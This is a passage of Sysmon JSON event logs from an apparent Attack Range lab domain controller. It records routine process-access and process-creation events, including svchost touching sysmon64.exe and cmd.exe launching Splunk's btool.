C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1708,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1709,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1710,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1711,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1712,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1713,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001032690300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001032690300}","TargetProcessId":"3948","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1714,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.805\r\nProcessGuid: {41C8662E-1F74-5F25-0000-0010066A0300}\r\nProcessId: 3960\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1F74-5F25-0000-001032690300}\r\nParentProcessId: 3948\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.805","ProcessGuid":"{41C8662E-1F74-5F25-0000-0010066A0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1F74-5F25-0000-001032690300}","ParentProcessId":"3948","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1715,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-001032690300}\r\nSourceProcessId: 3948\r\nSourceThreadId: 3952\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010066A0300}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-001032690300}","SourceProcessId":"3948","SourceThreadId":"3952","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010066A0300}","TargetProcessId":"3960","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
